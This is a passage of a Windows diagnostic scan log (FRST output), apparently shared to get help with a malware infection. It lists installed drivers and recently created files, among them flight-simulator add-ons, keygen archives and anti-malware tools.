C:\WINDOWS\System32\drivers\HipShieldK.sys [207968 2016-02-24] (McAfee, Inc.) R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [349960 2016-07-12] (Intel Corporation) R3 ikbevent; C:\WINDOWS\system32\DRIVERS\ikbevent.sys [21408 2013-08-13] () R3 imsevent; C:\WINDOWS\system32\DRIVERS\imsevent.sys [21920 2013-08-13] () R3 ISCT; C:\WINDOWS\System32\drivers\ISCTD64.sys [46568 2013-08-13] () R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-10-18] (Malwarebytes) R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) S0 megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies) R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [419616 2016-04-27] (McAfee, Inc.) S3 mfeapfk; C:\WINDOWS\System32\drivers\mfeapfk.sys [181584 2014-10-01] (McAfee, Inc.) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [349480 2016-04-27] (McAfee, Inc.) S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [83608 2016-04-27] (McAfee, Inc.) R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [493352 2016-04-27] (McAfee, Inc.) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [843048 2016-04-27] (McAfee, Inc.) R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [519976 2016-04-27] (McAfee, Inc.) S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [100136 2016-04-27] (McAfee, Inc.) R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.) R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [243488 2016-04-27] (McAfee, Inc.) S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] () R3 NETwNb64; C:\WINDOWS\System32\drivers\Netwbw02.sys [3506464 2015-11-15] (Intel Corporation) R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [751632 2015-05-14] (Realsil Semiconductor Corporation) S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [30448 2014-04-10] (Synaptics Incorporated) R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51320 2015-12-11] (Synaptics Incorporated) S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.) R3 sthid; C:\WINDOWS\System32\drivers\sthid.sys [21216 2016-09-01] (Splashtop Inc.) R1 VBoxNetAdp; C:\WINDOWS\system32\DRIVERS\VBoxNetAdp6.sys [121248 2016-09-12] (Oracle Corporation) R1 VBoxNetLwf; C:\WINDOWS\system32\DRIVERS\VBoxNetLwf.sys [195936 2016-09-12] (Oracle Corporation) S2 vcs; C:\Program Files (x86)\Common Files\Avnex\vcs64.sys [4096 2016-08-05] () [File not signed] R3 VCSVADHWSer; C:\WINDOWS\system32\DRIVERS\vcsvad.sys [29320 2015-10-01] (AVSOFT Corp.) R3 VirtualButtons; C:\WINDOWS\System32\drivers\VirtualButtons.sys [32024 2013-10-04] (Intel Corporation) S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation) R3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.) R3 XSplit_Dummy; C:\WINDOWS\system32\drivers\xspltspk.sys [26200 2015-05-25] (SplitmediaLabs Limited) S3 YMIDUSBW; C:\WINDOWS\system32\drivers\ymidusbx64.sys [43744 2015-07-28] (Yamaha Corporation) U3 aspnet_state; no ImagePath ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-10-20 07:28 - 2016-10-20 07:28 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\4317019a 2016-10-20 07:28 - 2016-10-20 07:28 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\14ea33ba 2016-10-19 15:10 - 2016-10-19 16:52 - 1211959812 _____ C:\Users\Kyle Aniel\Desktop\FINAL.mp4 2016-10-19 14:57 - 2016-10-19 15:00 - 00075420 _____ C:\Users\Kyle Aniel\Downloads\Addition.txt 2016-10-19 14:47 - 2016-10-20 15:01 - 00040292 _____ C:\Users\Kyle Aniel\Downloads\FRST.txt 2016-10-19 14:47 - 2016-10-19 16:31 - 00000000 ____D C:\FRST 2016-10-19 14:47 - 2016-10-19 14:47 - 02407424 _____ (Farbar) C:\Users\Kyle Aniel\Downloads\FRST64.exe 2016-10-19 06:30 - 2016-10-20 05:17 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\f70e5 2016-10-18 23:53 - 2016-10-18 23:53 - 00416068 _____ C:\WINDOWS\Minidump\101816-28921-01.dmp 2016-10-18 23:53 - 2016-10-18 23:53 - 00000000 ____D C:\WINDOWS\Minidump 2016-10-18 18:53 - 2016-10-18 18:53 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-10-18 18:52 - 2016-10-18 19:40 - 00001172 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware 2016-10-18 18:52 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys 2016-10-18 18:52 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2016-10-18 18:52 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2016-10-18 18:50 - 2016-10-18 18:53 - 00003198 _____ C:\Users\banie_000\Desktop\Rkill.txt 2016-10-18 18:50 - 2016-10-18 18:51 - 22851472 _____ (Malwarebytes ) C:\Users\Kyle Aniel\Downloads\mbam-setup-2.2.1.1043.exe 2016-10-18 18:48 - 2016-10-18 18:50 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Kyle Aniel\Downloads\rkill.exe 2016-10-18 14:17 - 2016-10-18 14:17 - 00000000 ____D C:\Quarantine 2016-10-18 14:16 - 2016-10-18 14:15 - 16056688 _____ (McAfee Inc) C:\Users\Kyle Aniel\Desktop\stinger64.exe 2016-10-17 21:28 - 2016-10-17 21:30 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ont2012xnj 2016-10-17 21:28 - 2016-10-17 21:30 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ont2012x 2016-10-17 21:26 - 2016-10-17 21:26 - 40738663 _____ C:\Users\Kyle Aniel\Downloads\ont2012x.zip 2016-10-17 21:26 - 2016-10-17 21:26 - 00590905 _____ C:\Users\Kyle Aniel\Downloads\ont2012xnj.zip 2016-10-17 21:17 - 2016-10-17 21:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\md80_cls_american_airlines 2016-10-17 21:16 - 2016-10-17 21:17 - 04223899 _____ C:\Users\Kyle Aniel\Downloads\md80_cls_american_airlines.zip 2016-10-17 20:22 - 2016-10-17 20:22 - 16057249 _____ C:\Users\Kyle Aniel\Downloads\Panama City Beach Sunset Time-Lapse.mp4 2016-10-17 19:20 - 2016-10-17 19:35 - 681446176 _____ C:\Users\Kyle Aniel\Desktop\nana project.mp4 2016-10-17 18:43 - 2016-10-17 18:43 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\2016-10 2016-10-16 20:26 - 2016-10-16 20:26 - 03546096 _____ C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen (1).zip 2016-10-16 20:26 - 2016-10-16 20:26 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\35554 2016-10-16 20:22 - 2016-10-16 20:25 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen 2016-10-16 20:22 - 2016-10-16 20:23 - 84771760 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super80-Professional.exe 2016-10-16 20:22 - 2016-10-16 20:22 - 05123441 _____ C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen.zip 2016-10-16 17:58 - 2016-10-16 19:33 - 00148096 _____ C:\Users\Kyle Aniel\Desktop\nana project.wlmp 2016-10-16 17:17 - 2016-10-16 17:18 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\edited picture 2016-10-16 06:34 - 2016-10-18 19:40 - 00002597 _____ C:\Users\Public\Desktop\AESHelp for FSX.lnk 2016-10-16 06:32 - 2016-10-16 06:32 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Aerosoft - Airport Enhancement Services (AES)2.21 2016-10-16 06:31 - 2016-10-16 06:31 - 59054928 _____ C:\Users\Kyle Aniel\Downloads\Aerosoft - Airport Enhancement Services (AES)2.21.rar 2016-10-15 21:17 - 2016-10-15 21:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\MD-8x 2016-10-15 21:11 - 2016-10-15 21:11 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC 4.858 2016-10-15 21:03 - 2016-10-15 21:10 - 09338380 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC 4.858.rar 2016-10-15 16:49 - 2016-10-15 17:00 - 2048196608 _____ C:\Users\Kyle Aniel\Downloads\7601.17514.101119-1850_Update_Sp_Wave1-GRMSP1.1_DVD.iso 2016-10-15 15:23 - 2016-10-15 15:24 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\boeing777v2 2016-10-15 15:22 - 2016-10-15 15:23 - 07004238 _____ C:\Users\Kyle Aniel\Downloads\boeing777v2.zip 2016-10-15 15:07 - 2016-10-15 15:07 - 01567616 _____ C:\Users\Kyle Aniel\Downloads\p787msx.zip 2016-10-15 11:57 - 2016-10-15 11:58 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Fs_Panel_Studio_keygen_by_Inferno 2016-10-15 11:57 - 2016-10-15 11:57 - 05050888 _____ C:\Users\Kyle Aniel\Downloads\Fs_Panel_Studio_keygen_by_Inferno.zip 2016-10-15 09:35 - 2016-10-15 09:35 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\BOEING_777_Panel 2016-10-15 09:32 - 2016-10-15 09:32 - 02200036 _____ C:\Users\Kyle Aniel\Downloads\BOEING_777_Panel.zip 2016-10-15 09:18 - 2016-10-15 09:18 - 28339782 _____ C:\Users\Kyle Aniel\Downloads\skyspirit2012_american_airlines_boeing_777-300er_n717an.zip 2016-10-15 09:18 - 2016-10-15 09:18 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\skyspirit2012_american_airlines_boeing_777-300er_n717an 2016-10-15 09:07 - 2016-10-15 09:08 - 55849165 _____ C:\Users\Kyle Aniel\Downloads\SkySpirit-PSS-B777-300ER-Merge.rar 2016-10-15 09:07 - 2016-10-15 09:07 - 10424790 _____ C:\Users\Kyle Aniel\Downloads\SKYSPIRIT2012 777-300ER American Airlines N717AN 2013.rar 2016-10-15 07:57 - 2016-10-15 07:57 - 00018081 _____ C:\Users\Kyle Aniel\Downloads\f-s-x-777-300-expansion-models.torrent 2016-10-14 23:46 - 2016-10-14 23:46 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSND_FSX_MD83 2016-10-14 23:44 - 2016-10-14 23:46 - 67436368 _____ C:\Users\Kyle Aniel\Downloads\FSND_FSX_MD83.zip 2016-10-14 23:16 - 2016-10-14 23:16 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Microsoft_Flight_Simulator_X_Deluxe_Edition 2016-10-14 22:55 - 2016-10-14 22:55 - 03794912 _____ C:\Users\Kyle Aniel\Downloads\MJ772BHC.zip 2016-10-14 22:55 - 2016-10-14 22:55 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\MJ772BHC 2016-10-14 22:53 - 2016-10-14 22:53 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\em77fsx 2016-10-14 22:44 - 2016-10-14 22:50 - 16805219 _____ C:\Users\Kyle Aniel\Downloads\em77fsx.zip 2016-10-13 21:00 - 2016-10-13 21:11 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CLS Boeing 747-200 v1 2016-10-13 20:38 - 2016-10-18 19:38 - 00001243 _____ C:\Users\banie_000\Desktop\Jed's Half-Life Model Viewer.lnk 2016-10-13 20:38 - 2016-10-13 20:38 - 00195825 _____ C:\Users\Kyle Aniel\Downloads\hlmv136_setup.zip 2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\hlmv136_setup 2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jed's Half-Life Model Viewer 1.3.6 2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Program Files (x86)\Jed's Half-Life Model Viewer 1.3.6 2016-10-13 20:36 - 2016-10-13 20:36 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Blender Foundation 2016-10-13 19:26 - 2016-10-13 19:26 - 00000210 _____ C:\MD81_.ini 2016-10-13 17:40 - 2016-10-13 17:40 - 00003454 _____ C:\WINDOWS\System32\Tasks\{7710BCDD-6C09-4CB1-A71B-FCC26146EBCA} 2016-10-13 17:24 - 2016-10-13 17:24 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC 4.927a_&_WideFS_6.995 2016-10-13 17:21 - 2016-10-13 17:21 - 04526316 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC 4.927a_&_WideFS_6.995.rar 2016-10-13 17:16 - 2016-10-13 17:21 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC4 2016-10-13 17:16 - 2016-10-13 17:16 - 03988172 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC4.zip 2016-10-13 16:53 - 2016-10-18 19:38 - 00001644 _____ C:\Users\banie_000\Desktop\Where are the manuals.doc.lnk 2016-10-13 16:53 - 2016-10-18 19:38 - 00001614 _____ C:\Users\banie_000\Desktop\RFP June Update.doc.lnk 2016-10-13 16:51 - 2016-10-13 16:51 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ready_for_pushback_boeing_747-200v2_fs2004 2016-10-13 15:28 - 2016-10-05 03:34 - 01051104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2016-10-13 15:28 - 2016-10-05 03:34 - 00894088 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2016-10-13 15:28 - 2016-10-05 03:31 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2016-10-13 15:28 - 2016-10-05 03:31 - 01353768 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2016-10-13 15:28 - 2016-10-05 03:31 - 01172472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2016-10-13 15:28 - 2016-10-05 03:17 - 01322848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll 2016-10-13 15:28 - 2016-10-05 03:13 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-10-13 15:28 - 2016-10-05 03:13 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll 2016-10-13 15:28 - 2016-10-05 03:13 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll 2016-10-13 15:28 - 2016-10-05 03:12 - 02446696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll 2016-10-13 15:28 - 2016-10-05 03:12 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2016-10-13 15:28 - 2016-10-05 03:09 - 22219328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2016-10-13 15:28 - 2016-10-05 03:09 - 00064352 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys 2016-10-13 15:28 - 2016-10-05 03:03 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2016-10-13 15:28 - 2016-10-05 02:51 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll 2016-10-13 15:28 - 2016-10-05 02:50 - 02256592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-10-13 15:28 - 2016-10-05 02:46 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll 2016-10-13 15:28 - 2016-10-05 02:46 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll 2016-10-13 15:28 - 2016-10-05 02:45 - 20965240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2016-10-13 15:28 - 2016-10-05 02:44 - 22568960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2016-10-13 15:28 - 2016-10-05 02:41 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2016-10-13 15:28 - 2016-10-05 02:38 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll 2016-10-13 15:28 - 2016-10-05 02:38 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll 2016-10-13 15:28 - 2016-10-05 02:36 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll 2016-10-13 15:28 - 2016-10-05 02:35 - 00327680 _____ C:\WINDOWS\system32\wc_storage.dll 2016-10-13 15:28 - 2016-10-05 02:35 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll 2016-10-13 15:28 - 2016-10-05 02:35 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll 2016-10-13 15:28 - 2016-10-05 02:34 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2016-10-13 15:28 - 2016-10-05 02:33 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll 2016-10-13 15:28 - 2016-10-05 02:33 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll 2016-10-13 15:28 - 2016-10-05 02:33 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll 2016-10-13 15:28 - 2016-10-05 02:33 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll 2016-10-13 15:28 - 2016-10-05 02:32 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll 2016-10-13 15:28 - 2016-10-05 02:32 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll 2016-10-13 15:28 - 2016-10-05 02:32 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll 2016-10-13 15:28 - 2016-10-05 02:31 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll 2016-10-13 15:28 - 2016-10-05 02:31 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll 2016-10-13 15:28 - 2016-10-05 02:31 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll 2016-10-13 15:28 - 2016-10-05 02:31 - 00425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2016-10-13 15:28 - 2016-10-05 02:30 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll 2016-10-13 15:28 - 2016-10-05 02:29 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2016-10-13 15:28 - 2016-10-05 02:29 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll 2016-10-13 15:28 - 2016-10-05 02:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll 2016-10-13 15:28 - 2016-10-05 02:28 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll 2016-10-13 15:28 - 2016-10-05 02:27 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2016-10-13 15:28 - 2016-10-05 02:27 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 23680512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00137216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovs.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 01589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll 2016-10-13 15:28 - 2016-10-05 02:24 - 13434368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-10-13 15:28 - 2016-10-05 02:24 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll 2016-10-13 15:28 - 2016-10-05 02:24 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\adsmsext.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll 2016-10-13 15:28 - 2016-10-05 02:22 - 13081088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 08075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 01364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll 2016-10-13 15:28 - 2016-10-05 02:20 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll 2016-10-13 15:28 - 2016-10-05 02:20 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2016-10-13 15:28 - 2016-10-05 02:20 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys 2016-10-13 15:28 - 2016-10-05 02:19 - 02390016 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe 2016-10-13 15:28 - 2016-10-05 02:19 - 02265088 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2016-10-13 15:28 - 2016-10-05 02:19 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2016-10-13 15:28 - 2016-10-05 02:19 - 00982528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 00759296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-10-13 15:28 - 2016-10-05 02:17 - 08126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2016-10-13 15:28 - 2016-10-05 02:17 - 02914304 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll 2016-10-13 15:28 - 2016-10-05 02:17 - 01493504 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2016-10-13 15:28 - 2016-10-05 02:16 - 19418624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2016-10-13 15:28 - 2016-10-05 02:16 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-10-13 15:28 - 2016-10-05 02:16 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll 2016-10-13 15:28 - 2016-10-05 02:16 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 07625728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 01980416 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2016-10-13 15:28 - 2016-10-05 02:15 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 02667520 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 02476544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 01778176 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll 2016-10-13 15:28 - 2016-10-05 02:12 - 01107456 _____ 